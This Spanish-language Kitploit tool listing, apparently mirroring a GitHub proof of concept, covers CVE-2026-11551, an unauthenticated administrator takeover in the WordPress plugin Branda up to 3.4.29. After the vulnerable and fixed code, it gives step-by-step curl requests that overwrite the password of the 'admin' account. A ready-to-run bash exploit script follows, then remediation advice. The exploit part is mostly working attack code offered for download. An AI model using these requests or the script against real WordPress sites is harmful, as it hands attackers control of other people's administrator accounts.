Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
By-Poloss..-..CVE-2026-11551-PoC — Unauthenticated Privilege Escalation via Account Takeover | Kitploit
Herramientas/GitHubGitHub/polosss/by-poloss..-..cve-2026-11551-poc
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-11551-poc

By-Poloss..-..CVE-2026-11551-PoC

Unauthenticated Privilege Escalation via Account Takeover

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 2 mesesAún no revisado

CVE-2026-11551: Plugin Branda - Escalada de Privilegios No Autenticada mediante Toma de Cuenta

Resumen

  • ID de CVE: CVE-2026-11551
  • Puntuación CVSS: 9.8 (Crítica)
  • Afectados: Branda – White Label & Branding <= 3.4.29
  • Corregido: 3.4.31
  • Publicado: 19 de junio de 2026

Descripción de la Vulnerabilidad

El plugin Branda para WordPress es vulnerable a la escalada de privilegios mediante toma de cuenta en todas las versiones hasta la 3.4.29 inclusive. Esto se debe a que el plugin no valida correctamente la identidad de un usuario antes de actualizar su contraseña. Esto permite que atacantes no autenticados cambien las contraseñas de usuarios arbitrarios, incluidos los administradores, y aprovechen eso para obtener acceso a su cuenta.

Análisis Técnico

Ubicación del Código Vulnerable

/inc/modules/login-screen/signup-password.php

Causa Raíz

La función pre_insert_user_data() en la versión vulnerable carece de la validación adecuada:

root@kitploit:~
// Versión vulnerable (3.4.29)
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Código de multisitio...
    }
    // Falta: if ($update) return $data; <-- VULNERABILIDAD
    
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // Establecer la contraseña desde los datos POST
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Código Corregido (3.4.31)

root@kitploit:~
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Código de multisitio con comprobaciones adecuadas...
    }

    // CORRECCIÓN: Se añadió comprobación para evitar actualizar usuarios existentes
    if ( $update ) {
        return $data;
    }

    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Vectores de Ataque

Vector 1: Registro en Multisitio (Principal)

  1. El atacante accede a /wp-signup.php
  2. Se registra con un nombre de usuario de administrador existente (por ejemplo, "admin")
  3. Establece una contraseña personalizada mediante el parámetro password_1
  4. Branda almacena la contraseña en los metadatos del registro
  5. Al activarse, la contraseña sobrescribe la contraseña del administrador existente

Vector 2: Registro en Sitio Único

  1. El atacante accede a /wp-login.php?action=register
  2. Branda añade campos de contraseña al formulario
  3. El atacante envía el registro con un nombre de usuario existente
  4. Si la activación se completa, la contraseña queda establecida

Prueba de Concepto (curl)

Paso 1: Comprobar si el Registro está Habilitado

root@kitploit:~
curl -s -k "https://TARGET/wp-login.php?action=register" | grep -i "registration"

Paso 2: Comprobar el Tipo de WordPress (Multisitio vs Sitio Único)

root@kitploit:~
curl -s -k -I "https://TARGET/wp-signup.php" | grep "HTTP/"

Paso 3: Para Multisitio - Registrar con Nombre de Usuario de Administrador

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-signup.php" \
  -d "user_name=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "signup_for=blog"

Paso 4: Para Sitio Único - Registrar

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php?action=register" \
  -d "user_login=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "wp-submit=Register"

Paso 5: Activar (si se requiere verificación por correo electrónico)

root@kitploit:~
# Extraer la clave de activación del correo y visitar:
curl -s -k -c cookies.txt -b cookies.txt \
  "https://TARGET/wp-activate.php?key=ACTIVATION_KEY"

Paso 6: Verificar - Intentar Iniciar Sesión

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php" \
  -d "log=admin" \
  -d "pwd=NewP@ssw0rd!" \
  -d "wp-submit=Log In" \
  -L | grep -i "dashboard\|wp-admin\|error"

Script de Explotación Automatizado

root@kitploit:~
#!/bin/bash
TARGET="https://TARGET"
USERNAME="admin"
NEW_PASSWORD="Pwned$(date +%s)!"

echo "[*] Registrando $USERNAME con contraseña $NEW_PASSWORD..."

# Ataque a multisitio
curl -s -k -c /tmp/cookies.txt \
  -X POST "$TARGET/wp-signup.php" \
  -d "user_name=$USERNAME" \
  -d "[email protected]" \
  -d "password_1=$NEW_PASSWORD" \
  -d "password_2=$NEW_PASSWORD"

echo "[*] Revisa el correo para obtener el enlace de activación"
echo "[*] Después de la activación, intenta: curl -X POST $TARGET/wp-login.php -d 'log=$USERNAME' -d 'pwd=$NEW_PASSWORD'"

Requisitos para la Explotación

  1. WordPress con el plugin Branda <= 3.4.29 instalado y activado
  2. El registro de usuarios debe estar habilitado (comprobar Ajustes > Generales > Membresía: Cualquiera puede registrarse)
  3. Para una toma de cuenta exitosa: El nombre de usuario objetivo debe existir
  4. Para Multisitio: Acceso al correo de activación (o bypass de activación)

Remediación

Actualice el plugin Branda a la versión 3.4.31 o posterior:

root@kitploit:~
# Mediante el Administrador de WordPress
Escritorio > Plugins > Branda > Actualizar

# Mediante WP-CLI
wp plugin update branda-white-labeling

# Mediante SSH
wp plugin update branda-white-labeling --version=3.4.31

Impacto

  • Confidencialidad: Alta - El atacante obtiene acceso a cualquier cuenta de usuario
  • Integridad: Alta - El atacante puede modificar contenido
  • Disponibilidad: Alta - El atacante puede bloquear a usuarios legítimos

Referencias

  • Wordfence Intelligence
  • WPScan
  • Plugin Trac

W.P.E.F

  • Canal de Telegram de W.P.E.F #1
  • Canal de Telegram de W.P.E.F #2
Descargar herramienta